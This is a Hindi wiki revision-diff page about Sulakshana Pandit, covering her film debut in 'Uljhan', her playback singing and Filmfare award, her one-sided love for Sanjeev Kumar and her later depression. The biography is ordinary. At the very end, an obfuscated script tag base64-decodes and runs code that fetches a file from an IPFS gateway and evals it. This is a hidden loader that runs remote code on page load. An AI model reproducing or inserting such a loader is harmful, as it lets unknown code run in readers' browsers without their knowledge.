"सुलक्षणा पंडित": अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:नेविगेशन, खोजें
(''''सुलक्षणा पंडित''' (अंग्रेज़ी: ''Sulakshana Pandit'', जन्म- 12 जुल...' के साथ नया पृष्ठ बनाया)
 
No edit summary
 
पंक्ति 1: पंक्ति 1:
'''सुलक्षणा पंडित''' ([[अंग्रेज़ी]]: ''Sulakshana Pandit'', जन्म- [[12 जुलाई]], [[1954]]) भारतीय सिनेमा की खूबसूरत तथा प्रसिद्ध अभिनेत्रियों में से एक थीं। अदाकारा होने के साथ-साथ वह एक बेहतरीन गायिका भी रहीं। उन्होंने अपनी फिल्मों में खुद के लिए गाने भी गाए और ये गाने काफी हिट भी रहे। सुलक्षणा पंडित ने अपने दौर के सभी बड़े सिने सितारों के साथ काम किया था। इनमें [[राजेश खन्ना]], [[जितेंद्र]], [[विनोद खन्ना]], [[शशि कपूर]], [[शत्रुघ्न सिन्हा]] और [[संजीव कुमार]] आदि शामिल हैं। अभिनेत्री सुलक्षणा पंडित ने [[1975]] में आई फिल्म ‘उलझन’ से बॉलीवुड में डेब्यू किया था। अपनी फिल्मों के साथ-साथ सुलक्षणा पंडित अपनी पर्सनल लाइफ को लेकर भी चर्चाओं में रहीं।
{{सूचना बक्सा कलाकार
|चित्र=Sulakshana-Pandit.jpg
|चित्र का नाम=सुलक्षणा पंडित
|पूरा नाम=सुलक्षणा पंडित
|प्रसिद्ध नाम=
|अन्य नाम=
|जन्म=[[12 जुलाई]], [[1954]]
|जन्म भूमि=
|मृत्यु=
|मृत्यु स्थान=
|अभिभावक=
|पति/पत्नी=
|संतान=
|कर्म भूमि=[[भारत]]
|कर्म-क्षेत्र=[[हिन्दी सिनेमा]]
|मुख्य रचनाएँ=
|मुख्य फ़िल्में=
|विषय=
|शिक्षा=
|विद्यालय=
|पुरस्कार-उपाधि=
|प्रसिद्धि=अभिनेत्री तथा पार्श्वगायिका
|विशेष योगदान=
|नागरिकता=भारतीय
|संबंधित लेख=[[संजीव कुमार]]
|शीर्षक 1=
|पाठ 1=
|शीर्षक 2=
|पाठ 2=
|अन्य जानकारी=सुलक्षणा मशहूर शास्त्रीय गायक [[पं. जसराज]] के परिवार से ताल्लुक रखती हैं। उनके तीन भाई संगीतकार जतिन-ललित, मंधीर, तीन बहनें माया एडरसन, संध्या सिंह और विजेयता पंडित हैं।
|बाहरी कड़ियाँ=
|अद्यतन={{अद्यतन|17:36, 27 जुलाई 2022 (IST)}}
}}'''सुलक्षणा पंडित''' ([[अंग्रेज़ी]]: ''Sulakshana Pandit'', जन्म- [[12 जुलाई]], [[1954]]) भारतीय सिनेमा की खूबसूरत तथा प्रसिद्ध अभिनेत्रियों में से एक थीं। अदाकारा होने के साथ-साथ वह एक बेहतरीन गायिका भी रहीं। उन्होंने अपनी फिल्मों में खुद के लिए गाने भी गाए और ये गाने काफी हिट भी रहे। सुलक्षणा पंडित ने अपने दौर के सभी बड़े सिने सितारों के साथ काम किया था। इनमें [[राजेश खन्ना]], [[जितेंद्र]], [[विनोद खन्ना]], [[शशि कपूर]], [[शत्रुघ्न सिन्हा]] और [[संजीव कुमार]] आदि शामिल हैं। अभिनेत्री सुलक्षणा पंडित ने [[1975]] में आई फिल्म ‘उलझन’ से बॉलीवुड में डेब्यू किया था। अपनी फिल्मों के साथ-साथ सुलक्षणा पंडित अपनी पर्सनल लाइफ को लेकर भी चर्चाओं में रहीं।
==परिचय==
==परिचय==
सुलक्षणा पंडित का जन्म 12 जुलाई, 1954 में [[छत्तीसगढ़]] के रायगढ़ में हुआ था। उन्होंने नौ साल की उम्र से ही गाना शुरू कर दिया था। सुलक्षणा ने [[1967]] में फिल्म के लिए पहली बार गाना गाया था। इसी दौरान उन्हें फिल्मों में एक्टिंग के लिए भी ऑफर मिलने लगे। सन [[1975]] में सुलक्षणा पंडित ने फिल्म 'उलझन' से डेब्यू किया। इस फिल्म में उनके अपोजिट एक्टर संजीव कुमार थे।<ref name="pp">{{cite web |url=https://www.amarujala.com/photo-gallery/entertainment/bollywood/sulakshana-pandit-tragic-life-story-after-sanjeev-kumar-rejected-her-love-proposal?pageId=5 |title=70 के दशक की मशहूर हीरोइन थीं सुलक्षणा पंडित|accessmonthday=27 जुलाई|accessyear=2022 |last= |first= |authorlink= |format= |publisher=amarujala.com |language=हिंदी}}</ref> सुलक्षणा मशहूर शास्त्रीय गायक [[पं. जसराज]] के परिवार से ताल्लुक रखती हैं। उनके तीन भाई संगीतकार जतिन-ललित, मंधीर, तीन बहनें माया एडरसन, संध्या सिंह और विजेयता पंडित हैं। हालांकि, इनकी बहन संध्या का मर्डर हो गया और छोटी बहन विजेयता विधवा है। संगीतकार भाई जतिन-ललित इन दिनों गुमनामी में है।  
सुलक्षणा पंडित का जन्म 12 जुलाई, 1954 में [[छत्तीसगढ़]] के रायगढ़ में हुआ था। उन्होंने नौ साल की उम्र से ही गाना शुरू कर दिया था। सुलक्षणा ने [[1967]] में फिल्म के लिए पहली बार गाना गाया था। इसी दौरान उन्हें फिल्मों में एक्टिंग के लिए भी ऑफर मिलने लगे। सन [[1975]] में सुलक्षणा पंडित ने फिल्म 'उलझन' से डेब्यू किया। इस फिल्म में उनके अपोजिट एक्टर संजीव कुमार थे।<ref name="pp">{{cite web |url=https://www.amarujala.com/photo-gallery/entertainment/bollywood/sulakshana-pandit-tragic-life-story-after-sanjeev-kumar-rejected-her-love-proposal?pageId=5 |title=70 के दशक की मशहूर हीरोइन थीं सुलक्षणा पंडित|accessmonthday=27 जुलाई|accessyear=2022 |last= |first= |authorlink= |format= |publisher=amarujala.com |language=हिंदी}}</ref> सुलक्षणा मशहूर शास्त्रीय गायक [[पं. जसराज]] के परिवार से ताल्लुक रखती हैं। उनके तीन भाई संगीतकार जतिन-ललित, मंधीर, तीन बहनें माया एडरसन, संध्या सिंह और विजेयता पंडित हैं। हालांकि, इनकी बहन संध्या का मर्डर हो गया और छोटी बहन विजेयता विधवा है। संगीतकार भाई जतिन-ललित इन दिनों गुमनामी में है।  
==एकतरफ़ा प्रेम==
==एकतरफ़ा प्रेम==
[[चित्र:Sulakshana-Pandit-and-Sanjeev-Kumar.jpg|thumb|left|250px|सुलक्षणा पंडित और [[संजीव कुमार]]]]
गंभीर स्वभाव के संजीव को देखते ही सुलक्षणा को उन पर प्यार आ गया। उस वक्त संजीव कुमार का दिल तो [[हेमा मालिनी]] पर आया हुआ था इसके बावजूद सुलक्षणा संजीव कुमार को चाहने लगीं। संजीव कुमार ने हेमा मालिनी को शादी के लिए प्रपोज किया तो उन्होंने इसे ठुकरा दिया, क्योंकि हेमा मालिनी [[धर्मेन्द्र]] से प्यार करती थीं। हेमा के मना करने के बाद संजीव कुमार का दिल टूट चुका था। उनकी और सुलक्षणा की तब तक काफी अच्छी दोस्ती हो चुकी थी। वो हर बात सुलक्षणा से शेयर करते रहते थे।
गंभीर स्वभाव के संजीव को देखते ही सुलक्षणा को उन पर प्यार आ गया। उस वक्त संजीव कुमार का दिल तो [[हेमा मालिनी]] पर आया हुआ था इसके बावजूद सुलक्षणा संजीव कुमार को चाहने लगीं। संजीव कुमार ने हेमा मालिनी को शादी के लिए प्रपोज किया तो उन्होंने इसे ठुकरा दिया, क्योंकि हेमा मालिनी [[धर्मेन्द्र]] से प्यार करती थीं। हेमा के मना करने के बाद संजीव कुमार का दिल टूट चुका था। उनकी और सुलक्षणा की तब तक काफी अच्छी दोस्ती हो चुकी थी। वो हर बात सुलक्षणा से शेयर करते रहते थे।



12:06, 27 जुलाई 2022 के समय का अवतरण

सुलक्षणा पंडित
सुलक्षणा पंडित
सुलक्षणा पंडित
पूरा नाम सुलक्षणा पंडित
जन्म 12 जुलाई, 1954
कर्म भूमि भारत
कर्म-क्षेत्र हिन्दी सिनेमा
प्रसिद्धि अभिनेत्री तथा पार्श्वगायिका
नागरिकता भारतीय
संबंधित लेख संजीव कुमार
अन्य जानकारी सुलक्षणा मशहूर शास्त्रीय गायक पं. जसराज के परिवार से ताल्लुक रखती हैं। उनके तीन भाई संगीतकार जतिन-ललित, मंधीर, तीन बहनें माया एडरसन, संध्या सिंह और विजेयता पंडित हैं।
अद्यतन‎

सुलक्षणा पंडित (अंग्रेज़ी: Sulakshana Pandit, जन्म- 12 जुलाई, 1954) भारतीय सिनेमा की खूबसूरत तथा प्रसिद्ध अभिनेत्रियों में से एक थीं। अदाकारा होने के साथ-साथ वह एक बेहतरीन गायिका भी रहीं। उन्होंने अपनी फिल्मों में खुद के लिए गाने भी गाए और ये गाने काफी हिट भी रहे। सुलक्षणा पंडित ने अपने दौर के सभी बड़े सिने सितारों के साथ काम किया था। इनमें राजेश खन्ना, जितेंद्र, विनोद खन्ना, शशि कपूर, शत्रुघ्न सिन्हा और संजीव कुमार आदि शामिल हैं। अभिनेत्री सुलक्षणा पंडित ने 1975 में आई फिल्म ‘उलझन’ से बॉलीवुड में डेब्यू किया था। अपनी फिल्मों के साथ-साथ सुलक्षणा पंडित अपनी पर्सनल लाइफ को लेकर भी चर्चाओं में रहीं।

परिचय

सुलक्षणा पंडित का जन्म 12 जुलाई, 1954 में छत्तीसगढ़ के रायगढ़ में हुआ था। उन्होंने नौ साल की उम्र से ही गाना शुरू कर दिया था। सुलक्षणा ने 1967 में फिल्म के लिए पहली बार गाना गाया था। इसी दौरान उन्हें फिल्मों में एक्टिंग के लिए भी ऑफर मिलने लगे। सन 1975 में सुलक्षणा पंडित ने फिल्म 'उलझन' से डेब्यू किया। इस फिल्म में उनके अपोजिट एक्टर संजीव कुमार थे।[1] सुलक्षणा मशहूर शास्त्रीय गायक पं. जसराज के परिवार से ताल्लुक रखती हैं। उनके तीन भाई संगीतकार जतिन-ललित, मंधीर, तीन बहनें माया एडरसन, संध्या सिंह और विजेयता पंडित हैं। हालांकि, इनकी बहन संध्या का मर्डर हो गया और छोटी बहन विजेयता विधवा है। संगीतकार भाई जतिन-ललित इन दिनों गुमनामी में है।

एकतरफ़ा प्रेम

सुलक्षणा पंडित और संजीव कुमार

गंभीर स्वभाव के संजीव को देखते ही सुलक्षणा को उन पर प्यार आ गया। उस वक्त संजीव कुमार का दिल तो हेमा मालिनी पर आया हुआ था इसके बावजूद सुलक्षणा संजीव कुमार को चाहने लगीं। संजीव कुमार ने हेमा मालिनी को शादी के लिए प्रपोज किया तो उन्होंने इसे ठुकरा दिया, क्योंकि हेमा मालिनी धर्मेन्द्र से प्यार करती थीं। हेमा के मना करने के बाद संजीव कुमार का दिल टूट चुका था। उनकी और सुलक्षणा की तब तक काफी अच्छी दोस्ती हो चुकी थी। वो हर बात सुलक्षणा से शेयर करते रहते थे।

संजीव कुमार जब हेमा मालिनी से अलग हो गए तो सुलक्षणा ने खुद ही अपने प्यार का इजहार संजीव कुमार से कर दिया, लेकिन होनी को तो शायद कुछ और ही मंजूर था। हेमा के मना करने के बाद उन्होंने सुलक्षणा को भी ठुकरा दिया। संजीव कुमार के ठुकराए जाने के बाद तो जैसे सुलक्षणा की जिंदगी ही उजड़ गई। उन्होंने फिल्में करनी छोड़ दीं और बाहरी दुनिया से नाता ही तोड़ लिया।

गायन

सुलक्षणा पंडित ने मात्र 9 साल की उम्र में गाना शुरू कर दिया था। शुरुआत में वे स्टेज शो करती थीं। फिल्मों में सुलक्षणा का सिंगिंग कॅरियर 'तकदीर' से शुरू हुआ। इस फिल्म में उन्होंने लता मंगेशकर के साथ 'सात संदर पार से...' गाना गाया था। उन्हें सन 1976 में फिल्म 'संकल्प' के गाने 'तू सागर है...' के लिए फिल्मफेयर अवॉर्ड मिला था। उन्होंने कई फिल्मों के लिए गाने गाए। इसके अलावा उन्होंने 'छुपा-छुपी खेले आओ' (फिल्म 'ड्रीम गर्ल'), 'मौसम मौसम लवली मौसम' (फिल्म 'थोड़ी सी बेवफाई'), 'माना तेरी नजर में तेरा प्यार हम नहीं' (फिल्म 'आहिस्ता-आहिस्ता'), 'बेकरार दिल'(फिल्म 'दूर का राही') सहित अन्य गाने गाए भी हैं।

मानसिक तनाव

सुलक्षणा अपनी मां के साथ मुंबई के एक फ्लैट में रहने लगीं थीं। मां के साथ रहते हुए भी उनकी हालत में कोई सुधार नहीं हुआ और वो डिप्रेशन में चली गईं। 1985 में जब संजीव कुमार की मौत हुई तो सुलक्षणा सदमे में चली गईं। कहते हैं सुलक्षणा अपना मानसिक संतुलन खो बैठीं और वो किसी को पहचानती भी नहीं थीं। इसका खुलासा खुद सुलक्षणा ने 1999 में एक इंटरव्यू में किया था।[1] सुलक्षणा पंडित ने कहा था, "संजीव के चले जाने के बाद मैं डिप्रेशन में चली गई थी। मैंने लगभग खुद को खत्म ही कर लिया था, लेकिन भगवान की मर्जी थी कि मैं बच गई और आज भी मैं अपनी जिंदगी जी रही हूं हालांकि मैं अभी भी उस सदमे से उबरी नहीं हूं। मैंने अपने कमरे का दरवाजा बंद कर लिया है और पूरे दिन मैं सिर्फ अच्छी फिल्में देखती हूं, गाने सुनती हूं ताकि मैं जिंदगी और इस दुनिया का सामना कर पाऊं।"

सुलक्षणा पंडित की बहन विजेयता ने बताया था कि 2006 में वे उन्हें अपने घर ले आई थीं। वे एक कमरे में रहती हैं और किसी से मिलती-जुलती नहीं। एक बार बाथरूम में गिर जाने की वजह से उनकी हिप बोन टूट गई थी। चार बार सर्जरी हुई। इस वजह से वे ठीक से चल भी नहीं पाती हैं।[2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 70 के दशक की मशहूर हीरोइन थीं सुलक्षणा पंडित (हिंदी) amarujala.com। अभिगमन तिथि: 27 जुलाई, 2022।
  2. जिंदा लाश की तरह जिंदगी गुजार रही 67 साल एक्ट्रेस (हिंदी) hindi.asianetnews.com। अभिगमन तिथि: 27 जुलाई, 2022।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>